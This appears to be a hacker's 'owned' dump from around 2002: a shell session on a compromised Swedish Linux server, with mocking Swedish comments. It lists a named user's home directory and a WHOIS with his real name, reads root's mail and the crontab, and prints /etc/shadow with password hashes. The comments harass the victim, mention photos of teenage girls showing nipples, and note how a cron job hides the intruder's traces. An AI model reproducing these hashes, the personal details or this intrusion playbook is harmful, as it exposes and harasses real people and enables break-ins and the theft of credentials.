1611. -rw-r--r-- 1 spacedmp spacedmp 201723 Oct 25 2001 closeup_lex.JPG
1612. -rw-r--r-- 1 spacedmp spacedmp 184130 Oct 25 2001 knarkadSanna.JPG
1613. -rw-r--r-- 1 spacedmp spacedmp 221898 Oct 25 2001 lex_sanna.JPG
1614. -rw-r--r-- 1 spacedmp spacedmp 196834 Oct 25 2001 lex_bord.JPG
1615. -rw-r--r-- 1 spacedmp spacedmp 13 Oct 27 2001 emmelie
1616. drwxr-xr-x 2 spacedmp spacedmp 1024 Oct 27 2001 debian
1617. -rw-r--r-- 1 spacedmp spacedmp 81 Oct 28 2001 sjsjjs
1618. -rwxr-xr-x 1 spacedmp spacedmp 12144 Oct 28 2001 tmp
1619. -rw-r--r-- 1 spacedmp spacedmp 357 Oct 28 2001 tmp.c
1620. -rw-r--r-- 1 spacedmp spacedmp 16002 Oct 30 2001 sanna_sjuk.JPG
1621. -rw-r--r-- 1 spacedmp spacedmp 11356 Oct 30 2001 sanna_sjuk2.JPG
1622. -rw-r--r-- 1 spacedmp spacedmp 16664 Oct 30 2001 sanna_sjuk3.JPG
1623. -rw-r--r-- 1 spacedmp spacedmp 293 Oct 31 2001 ipv6
1624. -rw-r--r-- 1 spacedmp spacedmp 138 Nov 2 2001 miffonisse
1625. -rw-r--r-- 1 spacedmp spacedmp 116 Nov 2 2001 taxi
1626. drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 2 2001 ga2
1627. -rw------- 1 spacedmp spacedmp 3453 Nov 4 2001 stenhagen
1628. -rw-r--r-- 1 spacedmp spacedmp 6140 Nov 4 2001 sverige2001
1629. -rw-r--r-- 1 spacedmp spacedmp 54956896 Nov 5 2001 holy_smal.mpg
1630. -rw-r--r-- 1 spacedmp spacedmp 245470 Nov 6 2001 phpBB-1.4.4.tar.gz
1631. drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 11 2001 zones
1632. -rw-r--r-- 1 spacedmp spacedmp 785 Nov 12 2001 keff.logg
1633. drwx------ 2 spacedmp spacedmp 6144 Nov 13 2001 micq.log
1634. -rw-r--r-- 1 spacedmp spacedmp 4603 Nov 13 2001 Gos_hunden.jpg
1635. -rw-r--r-- 1 spacedmp spacedmp 5091 Nov 13 2001 Gos_hunden2.jpg
1636. -rw-r--r-- 1 spacedmp spacedmp 99634 Nov 13 2001 Bild_4.jpg
1637. -rw-r--r-- 1 spacedmp spacedmp 83591 Nov 13 2001 sjuk&frsuen.jpg
1638. -rw-r--r-- 1 spacedmp spacedmp 104732 Nov 13 2001 Bild_3.jpg
1639. -rw-r--r-- 1 spacedmp spacedmp 109165 Nov 13 2001 Marianne.jpg
1640. -rw-r--r-- 1 spacedmp spacedmp 104444 Nov 13 2001 Micke.jpg
1641. -rw-r--r-- 1 spacedmp spacedmp 94516 Nov 13 2001 Angelgirl.jpg
1642. drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 13 2001 arin
1643. -rw-r--r-- 1 spacedmp spacedmp 74198 Nov 14 2001 Spd.jpg
1644. -rw-r--r-- 1 spacedmp spacedmp 71025 Nov 14 2001 Spd2.jpg
1645. -rw-r--r-- 1 spacedmp spacedmp 88413 Nov 14 2001 Spd3.jpg
1646. -rw-rw-rw- 1 spacedmp spacedmp 0 Nov 15 2001 .nfs344cd29a00007de6
1647. -rw-r--r-- 1 spacedmp spacedmp 8 Nov 16 2001 hej
1648. -rw-rw-rw- 1 spacedmp spacedmp 0 Nov 16 2001 .nfs344cda1f000084a3
1649. -rw-rw-rw- 1 spacedmp spacedmp 0 Nov 18 2001 .nfs344cd24e000086e7
1650. -rw-r--r-- 1 spacedmp spacedmp 35735 Nov 18 2001 lovisa.JPG
1651. -rw-r--r-- 1 spacedmp spacedmp 43341 Nov 18 2001 lovisa_gestikulerar.JPG
1652. -rw-r--r-- 1 spacedmp spacedmp 44369 Nov 18 2001 lovisa_kaaaaxig.JPG
1653. -rw-r--r-- 1 spacedmp spacedmp 45058 Nov 18 2001 unknown1.jpg
1654. -rw-r--r-- 1 spacedmp spacedmp 38398 Nov 18 2001 unknown2.jpg
1655. -rw-r--r-- 1 spacedmp spacedmp 39475 Nov 18 2001 unknown3.jpg
1656. -rw-r--r-- 1 spacedmp spacedmp 18789 Nov 18 2001 lovisa_silferstedt.JPG
1657. -rw-r--r-- 1 spacedmp spacedmp 32173 Nov 18 2001 lovisa_tittar_ner.JPG
1658. -rw-r--r-- 1 spacedmp spacedmp 46 Nov 20 2001 funstuff
1659. -rw-r--r-- 1 spacedmp spacedmp 163487 Nov 21 2001 tptest.zip
1660. -rw-r--r-- 1 spacedmp spacedmp 725 Nov 22 2001 stockholm-bans
1661. -rw-r--r-- 1 spacedmp spacedmp 4693 Nov 23 2001 stockholm-clients
1662. -rw-r--r-- 1 spacedmp spacedmp 479 Nov 24 2001 zones2
1663. drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 25 2001 test
1664. drwx------ 2 spacedmp spacedmp 1024 Nov 25 2001 .gnupg
1665. -rw-r--r-- 1 spacedmp spacedmp 106 Nov 25 2001 djdjdjd
1666. -rw-r--r-- 1 spacedmp spacedmp 239502 Nov 27 2001 droger.20011126.log
1667. -rw-r--r-- 1 spacedmp spacedmp 24352 Nov 27 2001 droger.20011127.log
1668. -rw-r--r-- 1 spacedmp spacedmp 315683 Nov 27 2001 droger.20011125.log
1669. -r-------- 1 spacedmp spacedmp 45 Nov 27 2001 k-line
1670. -rw-r--r-- 1 spacedmp spacedmp 13 Nov 27 2001 djdjdjdjd
1671. -rw-r--r-- 1 spacedmp spacedmp 1081040 Nov 29 2001 squid-2.4.STABLE3-src.tar.gz
1672. -rw-r--r-- 1 spacedmp spacedmp 22829 Nov 29 2001 stenhagen.lod
1673. -rw-r--r-- 1 spacedmp spacedmp 19573 Nov 30 2001 k-lines.log
1674. drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 30 2001 slaktarn
1675. -rw-r--r-- 1 spacedmp spacedmp 109 Nov 30 2001 sjsjsjs
1676. drwxr-xr-x 2 spacedmp spacedmp 1024 Nov 30 2001 hacka
1677. drwxr-xr-x 2 spacedmp spacedmp 1024 Dec 2 2001 bin
1678. drwxrwxr-x 2 spacedmp spacedmp 1024 Dec 3 2001 skrotaford
1679. -rw-r--r-- 1 spacedmp spacedmp 9 Dec 3 2001 molgan
1680. -rw-r--r-- 1 spacedmp spacedmp 89444 Dec 3 2001 AMsjuar.gif
1681. -rw-r--r-- 1 spacedmp spacedmp 13 Dec 3 2001 www.lunarstorm.se
1682. -rw-r--r-- 1 spacedmp spacedmp 34 Dec 5 2001 martin
1683. -rw------- 1 spacedmp spacedmp 76353 Dec 7 2001 irclinuxse.log
1684. -rw-r--r-- 1 spacedmp spacedmp 11663341 Dec 8 2001 neo4-first(blood)install.wmv
1685. -rw-r--r-- 1 spacedmp spacedmp 114468 Dec 8 2001 mf.txt
1686. -rw-r--r-- 1 spacedmp spacedmp 13 Dec 12 2001 gunnur
1687. -rw-rw-r-- 1 spacedmp spacedmp 1835 Dec 12 2001 sniff.c
1688. drwxrwxr-x 2 spacedmp spacedmp 1024 Dec 14 2001 porr
1689. -rw-r--r-- 1 spacedmp spacedmp 333 Dec 15 2001 ff
1690. -rw-r--r-- 1 spacedmp spacedmp 6602 Dec 15 2001 sd.tar.gz
1691. -rw-r--r-- 1 spacedmp spacedmp 6608 Dec 15 2001 sd2.tar.gz
1692. drwxr-xr-x 2 spacedmp spacedmp 1024 Dec 15 2001 sniff
1693. drwxr-xr-x 2 spacedmp root 1024 Dec 16 2001 mp3
1694. -rw-r--r-- 1 spacedmp spacedmp 33 Dec 18 2001 trackque
1695. -rw-r--r-- 1 spacedmp spacedmp 246 Dec 19 2001 hardcopy.14
1696. -rw-r--r-- 1 spacedmp spacedmp 89 Dec 19 2001 falcom
1697. -rw-r--r-- 1 spacedmp spacedmp 86016 Dec 25 2001 MOO.DLL
1698. drwxr-xr-x 2 spacedmp spacedmp 1024 Dec 26 2001 sniff2
1699. -rwxr-xr-x 1 spacedmp spacedmp 20310 Dec 27 2001 cidr
1700. -rw-r--r-- 1 spacedmp spacedmp 61 Dec 27 2001 smsm
1701. -rw------- 1 spacedmp spacedmp 203385375 Dec 30 2001 ircnet.log.old.gz
1702. drwxr-xr-x 3 spacedmp spacedmp 1024 Dec 30 2001 mp3dl
1703. -rw-r--r-- 1 spacedmp spacedmp 1943 Jan 1 2002 HOLMEN.TXT
1704. -rw-r--r-- 1 spacedmp spacedmp 3957374 Jan 3 2002 ronny_&_ragge_-_rara_s�ta_anna.mp3
1705. -rw-r--r-- 1 spacedmp spacedmp 5710 Jan 3 2002 orion.nfo
1706. -rw-r--r-- 1 spacedmp spacedmp 490927 Jan 3 2002 ornfb2b2.zip
1707. -rw-r--r-- 1 spacedmp spacedmp 601 Jan 3 2002 kernel-fbsd
1708. -rw-r--r-- 1 spacedmp spacedmp 4266 Jan 4 2002 tgrep.log
1709. -rw-r--r-- 1 spacedmp spacedmp 4758 Jan 4 2002 tgrep.log.host-to-ip
1710. -rw-r--r-- 1 spacedmp spacedmp 121 Jan 6 2002 k-lines
1711. drwxrwxr-x 2 spacedmp spacedmp 1024 Jan 6 2002 franvaro
1712. -rw-r--r-- 1 spacedmp spacedmp 314296 Jan 7 2002 phpMyAdmin-2.2.3-php.tar.gz
1713. -rw-r--r-- 1 spacedmp spacedmp 138 Jan 7 2002 compaq
1714. drwxr-xr-x 5 root root 1024 Jan 9 2002 Anna
1715. drwxr-xr-x 2 spacedmp spacedmp 1024 Jan 11 2002 msn
1716. -rw-r--r-- 1 spacedmp spacedmp 46 Jan 11 2002 test.irc
1717. -rw-r--r-- 1 spacedmp spacedmp 66786963 Jan 11 2002 Sverigekartan_Version_3.0_Lantmateriet_SWEDiSH.zip
1718. -rw-r--r-- 1 spacedmp spacedmp 1163309 Jan 13 2002 pang.mpg
1719. drwxr-xr-x 2 spacedmp spacedmp 1024 Jan 15 2002 remove
1720. -rw-r--r-- 1 spacedmp spacedmp 9581 Jan 15 2002 passwd
1721. -rw-r--r-- 1 spacedmp spacedmp 687 Jan 15 2002 sshd_config
1722. drwxr-xr-x 3 spacedmp spacedmp 1024 Jan 15 2002 exploit
1723. drwxr-xr-x 5 spacedmp spacedmp 1024 Jan 15 2002 tester
1724. drwxr-xr-x 2 spacedmp spacedmp 1024 Jan 15 2002 logs
1725. -rw-r--r-- 1 spacedmp spacedmp 169616 Jan 18 2002 adodb171.tgz
1726. -rw-r--r-- 1 spacedmp spacedmp 2033661 Jan 18 2002 Duke_Nukem_3D_-_Theme_Song.mp3
1727. drwxr-xr-x 2 spacedmp spacedmp 1024 Jan 19 2002 css
1728. -rw-r--r-- 1 spacedmp spacedmp 688 Jan 19 2002 logrotate
1729. drwxrwxr-x 2 spacedmp spacedmp 1024 Jan 20 2002 samtalspec
1730. -rw-r--r-- 1 spacedmp spacedmp 57201 Jan 24 2002 .ircrc.new
1731. -rw-r--r-- 1 spacedmp spacedmp 2326 Jan 29 2002 nu-users
1732. -rw-r--r-- 1 spacedmp spacedmp 990 Jan 29 2002 nu-users.scan
1733. -rw-rw-r-- 1 spacedmp spacedmp 614697 Jan 29 2002 poslog10.txt
1734. -rw-rw-r-- 1 spacedmp spacedmp 593392 Jan 30 2002 poslog20020130.txt
1735. -rw-rw-r-- 1 spacedmp spacedmp 567118 Jan 30 2002 poslog20020130-gottsunda-granbyc-gottsunda.txt
1736. -rw-r--r-- 1 spacedmp spacedmp 93 Jan 31 2002 GIS
1737. -rw-r--r-- 1 spacedmp spacedmp 45 Feb 4 2002 _fjortisar
1738. -rw-r--r-- 1 spacedmp spacedmp 45 Feb 4 2002 .fjortisar
1739. -rw-r--r-- 1 spacedmp spacedmp 14 Feb 5 2002 brute
1740. drwxr-xr-x 2 spacedmp spacedmp 1024 Feb 5 2002 pos
1741. -rw-r--r-- 1 spacedmp spacedmp 47322 Feb 8 2002 data.log
1742. -rw-r--r-- 1 spacedmp spacedmp 81899 Feb 8 2002 acid-0.9.6b12.tar.gz
1743. drwxr-xr-x 35 spacedmp spacedmp 1024 Feb 10 2002 src
1744. drwxr-xr-x 2 spacedmp spacedmp 2048 Feb 10 2002 adodb
1745. drwxr-xr-x 4 spacedmp spacedmp 1024 Feb 10 2002 phplot
1746. -rw-r--r-- 1 spacedmp spacedmp 2002639 Feb 12 2002 webmailen.tgz
1747. drwxr-xr-x 2 spacedmp spacedmp 1024 Feb 14 2002 tmpdl
1748. -rw-r--r-- 1 spacedmp spacedmp 10017 Feb 16 2002 wget.doit
1749. -rw-r--r-- 1 spacedmp spacedmp 44163 Feb 17 2002 lusers.list
1750. drwxr-xr-x 2 spacedmp spacedmp 1024 Feb 17 2002 FreeBSD
1751. -rw-r--r-- 1 spacedmp spacedmp 2951 Feb 18 2002 poliskoder.txt
1752. -rw-r--r-- 1 spacedmp spacedmp 4068 Feb 20 2002 lj-announce
1753. -rw-r--r-- 1 spacedmp spacedmp 697256 Feb 21 2002 warforge.bnetd.v1.14c.tar.gz
1754. -rw-r--r-- 1 spacedmp spacedmp 13086 Feb 21 2002 kort1227.gif
1755. -rw-r--r-- 1 spacedmp spacedmp 253182 Feb 22 2002 msxml.pas
1756. -rw-r--r-- 1 spacedmp spacedmp 8053707 Feb 24 2002 war3.zip
1757. -rw-r--r-- 1 spacedmp spacedmp 1178 Mar 1 2002 djdjdjfjkklfs
1758. -rw-r--r-- 1 spacedmp spacedmp 37812 Mar 2 2002 #bimbopojkarna.IRCNet.20020302.log
1759. -rw-r--r-- 1 spacedmp spacedmp 24005 Mar 5 2002 T61andT62.gif
1760. -rw-r--r-- 1 spacedmp spacedmp 344576 Mar 6 2002 after.vsd
1761. -rw-r--r-- 1 spacedmp spacedmp 484864 Mar 6 2002 before.vsd
1762. -rw-r--r-- 1 spacedmp spacedmp 5197 Mar 9 2002 ulug-provo-hemsa.zip
1763. -rwxr-xr-x 1 spacedmp spacedmp 32 Mar 10 2002 nisse.sh
1764. -rw-r--r-- 1 spacedmp spacedmp 1336 Mar 10 2002 burken.log
1765. -rw-r--r-- 1 spacedmp spacedmp 15262 Mar 12 2002 pinerc016343
1766. -rw-r--r-- 1 spacedmp spacedmp 19456 Mar 15 2002 processorhastigheter.doc
1767. -rw-r--r-- 1 spacedmp spacedmp 40526 Mar 18 2002 buglist.cgi?bug_status=NEW&bug_status=ASSIGNED&bug_status=REOPENED&bug_severity=critical&bug_severity=major&bug_severity=normal&bug_severity=minor
1768. -rw-r--r-- 1 spacedmp spacedmp 58 Mar 21 2002 remshit.sh
1769. -rw-r--r-- 1 spacedmp spacedmp 1302042 Mar 23 2002 arla-0.35.7.tar.gz
1770. -rw-r--r-- 1 spacedmp spacedmp 13926 Mar 27 15:31 anm.cgi
1771. drwxrwxr-x 2 spacedmp spacedmp 1024 Mar 29 09:39 t-shirt
1772. -rw-rw-r-- 1 spacedmp spacedmp 33306 Apr 1 18:03 selfverification.tar.gz
1773. -rw-r--r-- 1 spacedmp spacedmp 9 Apr 3 12:30 nisseroot
1774. -rw-r--r-- 1 spacedmp spacedmp 1138398 Apr 3 22:09 squirrelmail-1.2.5.tar.bz2
1775. drwx------ 2 spacedmp spacedmp 4096 Apr 8 07:57 SolveIT
1776. drwxr-xr-x 2 spacedmp spacedmp 1024 Apr 9 07:46 tetetetete
1777. drwxr-xr-x 3 spacedmp spacedmp 1024 Apr 10 08:44 hack
1778. -rw-r--r-- 1 spacedmp spacedmp 443244 Apr 13 19:09 DSC00013.JPG
1779. -rw-r--r-- 1 spacedmp spacedmp 3339 Apr 15 00:35 phoogle.tar.gz
1780. -rw-r--r-- 1 spacedmp spacedmp 10456 Apr 24 20:02 tfl.nfo
1781. drwxr-xr-x 2 spacedmp spacedmp 1024 Apr 28 19:53 .mc
1782. -rw-r--r-- 1 spacedmp spacedmp 14832 May 5 10:47 netstat.out
1783. drwxr-xr-x 2 spacedmp spacedmp 1024 May 5 14:10 tmptmp
1784. -rw-r--r-- 1 spacedmp spacedmp 3792330 May 12 09:21 R._Kelly_-_The_World's_Greatest07.mp3
1785. -rw-rw-r-- 1 spacedmp spacedmp 16463 May 12 13:24 shell-linux-se-FAQ.htm
1786. -rw-r--r-- 1 spacedmp spacedmp 10401669 May 20 21:01 Delerium_-_Semantic_Spaces_-_07_-_Flatlands.mp3
1787. -rw-r--r-- 1 spacedmp spacedmp 495065 May 21 18:15 phpBB-2.0.1.tar.gz
1788. drwxrwxr-x 2 spacedmp spacedmp 1024 May 21 23:19 mp3-tracit
1789. drwxr-xr-x 2 spacedmp spacedmp 1024 May 22 10:23 clones
1790. -rw-r--r-- 1 root root 4287 May 25 15:15 spam-mail
1791. -rw-r--r-- 1 root root 112 Jun 2 13:19 .bashrc
1792. -rw------- 1 spacedmp spacedmp 767260 Jun 9 13:40 ircnet-who.log
1793. -rw-r--r-- 1 spacedmp spacedmp 8404 Jun 9 20:56 hardcopy.0
1794. -rw-r--r-- 1 spacedmp spacedmp 700700 Jun 12 20:14 phpBB.dump
1795. -rw-r--r-- 1 spacedmp spacedmp 3429 Jun 14 09:44 azer_06_14_02.txt
1796. -rw-r--r-- 1 spacedmp spacedmp 122 Jun 15 17:19 compaq-burk
1797. -rw-rw-rw- 1 spacedmp spacedmp 0 Jun 20 11:40 .nfs344cd43900014237
1798. -rw-rw-rw- 1 spacedmp spacedmp 0 Jun 23 00:18 .nfs344cd60d0001750f
1799. -rw-r--r-- 1 spacedmp spacedmp 2920 Jun 25 15:38 rzr-wc3.006
1800. drwxr-xr-x 2 spacedmp spacedmp 1024 Jun 27 22:46 dkdkdkdkdkdd
1801. -rw------- 1 spacedmp spacedmp 194 Jun 30 11:09 .cvspass
1802. -rw-r--r-- 1 spacedmp spacedmp 2934646 Jun 30 12:08 screenlog.4
1803. -rw-r--r-- 1 spacedmp spacedmp 49 Jul 1 22:22 menuback.gif
1804. -rw-r--r-- 1 spacedmp spacedmp 1422 Jul 6 15:25 mailen.txt
1805. -rw-r--r-- 1 spacedmp spacedmp 23 Jul 19 15:23 .htpasswd-cam
1806. drwxr-xr-x 22 spacedmp spacedmp 1024 Jul 24 12:34 coding
1807. -rw-r--r-- 1 spacedmp spacedmp 484674 Jul 27 14:08 snapshot1.png
1808. -rw-r--r-- 1 spacedmp spacedmp 181169 Aug 7 11:18 putty-guide.zip
1809. -rw-r--r-- 1 spacedmp spacedmp 404 Aug 7 13:39 putty-latest.zip
1810. -rw-r--r-- 1 spacedmp spacedmp 188353 Aug 7 13:41 putty.zip
1811. drwxr-xr-x 2 spacedmp spacedmp 1024 Aug 7 13:42 nissenisse
1812. drwxr-xr-x 2 spacedmp spacedmp 1024 Aug 10 09:39 solveit
1813. -rw-r--r-- 1 spacedmp spacedmp 25313280 Aug 10 11:02 spacedmp.oldlaptop
1814. drwxr-xr-x 3 spacedmp spacedmp 1024 Aug 10 11:02 oldlaptop
1815. -rw-r--r-- 1 spacedmp spacedmp 1977 Aug 17 18:59 zatzy-sd
1816. drwxr-xr-x 4 spacedmp spacedmp 1024 Aug 23 22:04 .irc
1817. -rw-r--r-- 1 root root 26955 Aug 24 13:24 evonite.maillog
1818. -rw------- 1 spacedmp spacedmp 39761 Aug 25 01:24 ludd-klines
1819. -rw------- 1 spacedmp spacedmp 204906 Sep 1 18:16 .pine-debug4
1820. -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 00:30 mrtg.new.cfg_l_3272
1821. -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 00:31 mrtg.new.cfg_l_3431
1822. -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 00:52 mrtg.new.cfg_l_1034
1823. -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_949
1824. -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_915
1825. -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_826
1826. -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_756
1827. -rw-r--r-- 1 spacedmp spacedmp 0 Sep 3 01:00 mrtg.new.cfg_l_741
1828. -rw-rw-rw- 1 spacedmp spacedmp 0 Sep 5 16:50 mrtg.new.cfg_l
1829. -rw-r--r-- 1 spacedmp spacedmp 15262 Sep 5 20:13 .pinerc
1830. -rw------- 1 spacedmp spacedmp 138705 Sep 7 19:46 .pine-debug3
1831. -rw-r--r-- 1 spacedmp spacedmp 6542 Sep 8 21:48 sballo-hosts
1832. drwxr-xr-x 2 spacedmp spacedmp 1024 Sep 10 15:15 tetetest
1833. -rw------- 1 spacedmp spacedmp 201092 Sep 10 16:52 .pine-debug2
1834. -rw------- 1 spacedmp spacedmp 10568 Sep 11 14:03 sverigetail.log
1835. drwxr-xr-x 2 spacedmp spacedmp 2048 Sep 13 23:58 dl
1836. -rw-r--r-- 1 spacedmp spacedmp 47 Sep 16 15:57 comhem-koder
1837. drwxr-xr-x 2 spacedmp spacedmp 1024 Sep 17 18:22 .ncftp
1838. -rw------- 1 spacedmp spacedmp 73058 Sep 17 18:22 anna.log
1839. -rw-r--r-- 1 spacedmp spacedmp 1236 Sep 19 12:39 .sieve
1840. -rw------- 1 spacedmp spacedmp 8324532 Sep 19 22:53 efnet.log
1841. -rw------- 1 spacedmp spacedmp 110103 Sep 20 14:26 solveit.log
1842. -rw------- 1 spacedmp spacedmp 201406 Sep 20 19:49 .pine-debug1
1843. -rw-r--r-- 1 spacedmp spacedmp 198991 Sep 21 00:15 doc.tar
1844. -rw------- 1 spacedmp spacedmp 858073180 Sep 21 09:38 ircnet.log
1845. -rw-r--r-- 1 spacedmp spacedmp 198185 Sep 21 10:02 doc.tgz
1846. drwxrwx--x 148 spacedmp spacedmp 10240 Sep 21 10:02 public_html
1847. -rw-r--r-- 1 spacedmp spacedmp 14 Sep 22 10:45 djurvall.txt
1848. -rw------- 1 spacedmp spacedmp 14165 Sep 22 19:13 dead.letter
1849. -rw------- 1 spacedmp spacedmp 120202 Sep 22 21:21 .mysql_history
1850. -rw-r----- 1 spacedmp spacedmp 7516 Sep 22 21:21 .bash_history
1851. drwx------ 2 spacedmp spacedmp 1024 Sep 22 22:50 mail
1852. drwxrwx--x 167 spacedmp spacedmp 75776 Sep 22 22:50 .
1853. drwxr-xr-x 5 root root 0 Sep 23 00:50 ..
1854.  
1855. #
1856. # F�r fan, hyr en st�dfirma som rensar $HOME din j�vla geek
1857. #
1858. # Ey, Nisseman@IRC - Spacedump hatar dig :-)
1859. # Holmen - spacedump gillar inte dig heller
1860. # Massor av ircloggar - #droger ligger illa till.
1861. #
1862. # :DDDDDDDDDDDDDDDDD
1863. # Den h�r katalogen har stuff till en hel bok med bilder p� en h�g
1864. # Sanna, bilder p� fjortisar som visar br�stv�rter, ircloggar,
1865. # lunarstorm-konto. . . :DDDDDDDDDDD
1866. #
1867. # home-spacedmp.tar.gz kommer s�ljas p� CD-skivor @ blocket.se
1868. #
1869.  
1870.  
1871. $ tail ircnet.log
1872. *** No O-lines for your host
1873. [ 11,0109:34:54 15,1] Nickname: SpaceDump
1874. [ 11,0109:34:54 15,1] n 3,01! 15,01u 6,01@ 15,1h: SpaceDump 3,01! 15,1spacedmp 6,01@ 15,1SpaceDump.PP.SE
1875. [ 11,0109:34:54 15,1] Realname: Anders Olausson
1876. [ 11,0109:34:54 15,1] Channels: #socs
1877. [ 11,0109:34:54 15,1] Server: irc.swipnet.se
1878. [ 11,0109:34:54 15,1] Info: SWIPnet (Tele2 Sweden AB (Tele2 AB))
1879. [ 11,0109:34:54 15,1] SpaceDump has been idle for 7 seconds
1880. [ 11,0109:34:54 15,1] End of whois
1881. IRC log ended Sat Sep 21 09:34:56 2002
1882.  
1883.  
1884. # Ok, elajt
1885.  
1886.  
1887. $ cd /var/spool/mail
1888.  
1889.  
1890. #
1891. # r3ad1ng j00r e-m41l, h4wh4wh4wh4w
1892. #
1893.  
1894. $ ls -alrt
1895. total 16
1896. -rw-rw---- 1 root mail 7429 Jun 21 2000 root
1897. drwxr-xr-x 13 root root 4096 Mar 16 2002 ..
1898. drwxrwxrwt 2 root mail 4096 Mar 31 11:29 .
1899. $ cat root
1900.  
1901. .......
1902.  
1903. Welcome! Glad to see you've made it this far! :^)
1904.  
1905. .......
1906.  
1907.  
1908. Have fun!
1909.  
1910. ---
1911. Patrick Volkerding
1912. [email protected]
1913.  
1914. .......
1915.  
1916.  
1917. # Jaja, nu vet vi i alla fall att vi har root p� en slackwareburk
1918.  
1919.  
1920. $ host -t mx burken.nu
1921. burken.nu mail is handled (pri=5) by mail-gw.spacedump.pp.se
1922. $ host mail-gw.spacedump.pp.se
1923. mail-gw.spacedump.pp.se has address 194.236.124.30
1924.  
1925.  
1926. # Ajd� ;<
1927. # Mail finns p� en annan burk
1928.  
1929.  
1930. $ uname -a
1931. Linux fs02 2.4.9 #1 SMP Thu Aug 23 18:44:06 CEST 2001 i686 unknown
1932. $ crontab -l &
1933. # If you don't want the output of a cron job mailed to you, you have to direct
1934. # any output to /dev/null. We'll do this here since these jobs should run
1935. # properly on a newly installed system, but if they don't the average newbie
1936. # might get quite perplexed about getting strange mail every 5 minutes. :^)
1937. #
1938. # Run the 'atrun' program every 5 minutes
1939. # This runs anything that's due to run from 'at'. See man 'at' or 'atrun'.
1940. # Note that this is commented out since it's not needed if you run atd. But,
1941. # it's left as an example, since atd isn't strictly required. You can still
1942. # run it this way instead.
1943. #0,5,10,15,20,25,30,35,40,45,50,55 * * * * /usr/sbin/atrun 1> /dev/null 2> /dev/null
1944. #
1945. # This touches a filename in the temp directory so that you can see cron is
1946. # working if the timestamp is current. Comment it out if it bugs you. :^)
1947. # * * * * * touch /tmp/.crond_running
1948. 0 3 * * * /root/scripts/xmms-backup 1> /dev/null 2> /dev/null
1949.  
1950. #0,30 * * * * /usr/apps/rsync/2.4.6/bin/rsync -avzC --delete --delete-after rsync.php.net::phpweb /usr/web/webs/se2.php.net
1951. #15 2 * * * /usr/apps/rsync/2.4.6/bin/rsync -rtlzv --delete --exclude incoming dev.apache.org::apache-site /usr/web/webs/www.apache.org
1952. 0 2 * * * /usr/apps/rsync/2.4.6/bin/rsync -avzC --delete --delete-after rsync.php.net::phpweb /export/vol2/webs/se2.php.net
1953. #15 2 * * * /usr/apps/rsync/2.4.6/bin/rsync -rtlzv --delete --exclude incoming dev.apache.org::apache-site /export/vol2/webs/www.apache.org
1954.  
1955. # ftp-mirrors
1956. 15 1 * * * /root/mirror/mirror /root/mirror/packages/ftp.epicsol.org
1957.  
1958. # www3.se.postgresql.org
1959. 30 12 * * * /usr/apps/rsync/2.4.6/bin/rsync -avz --progress --stats --rsh=/usr/bin/rsh --delete rsync.postgresql.org::pgsql-www/ /export/vol2/webs/www3.se.postgresql.org/
1960. 30 0 * * * /usr/apps/rsync/2.4.6/bin/rsync -avz --progress --stats --rsh=/usr/bin/rsh --delete rsync.postgresql.org::pgsql-www/ /export/vol2/webs/www3.se.postgresql.org/
1961.  
1962. 0 0 * * mon /usr/web/bin/apachectl graceful
1963.  
1964. #
1965. # Aha - det var ju hygglo att starta om Apache till oss just inatt
1966. # Kombinationen av logfilerna och detta cronjobet �r mycket vackert.
1967. #
1968.  
1969. $ cd /root/src
1970. $ ls -l
1971. total 40
1972. drwxr-xr-x 2 spacedmp spacedmp 4096 Sep 7 02:10 chkrootkit-pre-0.36
1973. drwxr-xr-x 14 mysql mysql 4096 Jun 30 09:54 cvs-1.11.2
1974. drwxr-xr-x 22 38579 wheel 4096 May 24 2000 cyrus-imapd-1.6.24
1975. drwxr-xr-x 15 utah 30 4096 Sep 5 15:43 krb4-1.1.1
1976. drwxr-xr-x 9 mysql users 4096 Jan 11 2002 libtool-1.4.2
1977. drwxr-xr-x 3 root root 4096 Jan 16 2002 lsof
1978. drwxr-xr-x 7 mysql mysql 8192 Sep 15 21:38 openssh-3.4p1
1979. drwxr-xr-x 15 274 wheel 4096 Sep 15 21:37 ucd-snmp-4.2.5
1980. drwxr-xr-x 5 root root 4096 Aug 25 21:29 www
1981.  
1982.  
1983. # Lille v�n, chkrootkit funkar bara om man blir �gd av kiddies
1984.  
1985.  
1986. $ cat /etc/shadow
1987. root:7yZxF1iGqXeH.:11616:0:::::
1988. bin:*:9797:0:::::
1989. daemon:*:9797:0:::::
1990. adm:*:9797:0:::::
1991. lp:*:9797:0:::::
1992. sync:*:9797:0:::::
1993. shutdown:*:9797:0:::::
1994. halt:*:9797:0:::::
1995. mail:*:9797:0:::::
1996. news:*:9797:0:::::
1997. uucp:*:9797:0:::::
1998. operator:*:9797:0:::::
1999. games:*:9797:0:::::
2000. ftp:*:9797:0:::::
2001. gdm:*:9797:0:::::
2002. linux:11oNFsK5/97YU:11617:0:::::
2003. bbuser:dm6lHDjg1/8hM:11643:0:::::
2004. nobody:*:9797:0:::::
2005. warez:7yZxF1iGqX:11770:0:::::
2006. annamp3:halFIc6xVVpN6:11770:0:::::
2007. ntadmin:!:11915:0:99999:7:::
2008. sdlaptop$:!:11915:0:99999:7:::
2009. burken-oxv7pnpq$:!:11916:0:99999:7:::
2010. puff$:!:11916:0:99999:7:::
2011. fs03$:!:11916:0:99999:7:::
2012. sd-lfs:/Qs1Tf3YU5VaE:11933:0:99999:7:::
2013.  
2014.  
2015. # NIS+ :-(
2016.  
2017.  
2018. $ cd /root/coding
2019. $ ls -lart
2020. total 20
2021. drwxr-xr-x 10 root bin 4096 Dec 8 2001 irc2.10.3p3
2022. drwxr-xr-x 2 root root 4096 Dec 12 2001 sniff
2023. drwx--x--- 17 root root 4096 Sep 20 15:37 ..
2024. drwxr-xr-x 5 root root 4096 Sep 22 15:55 .
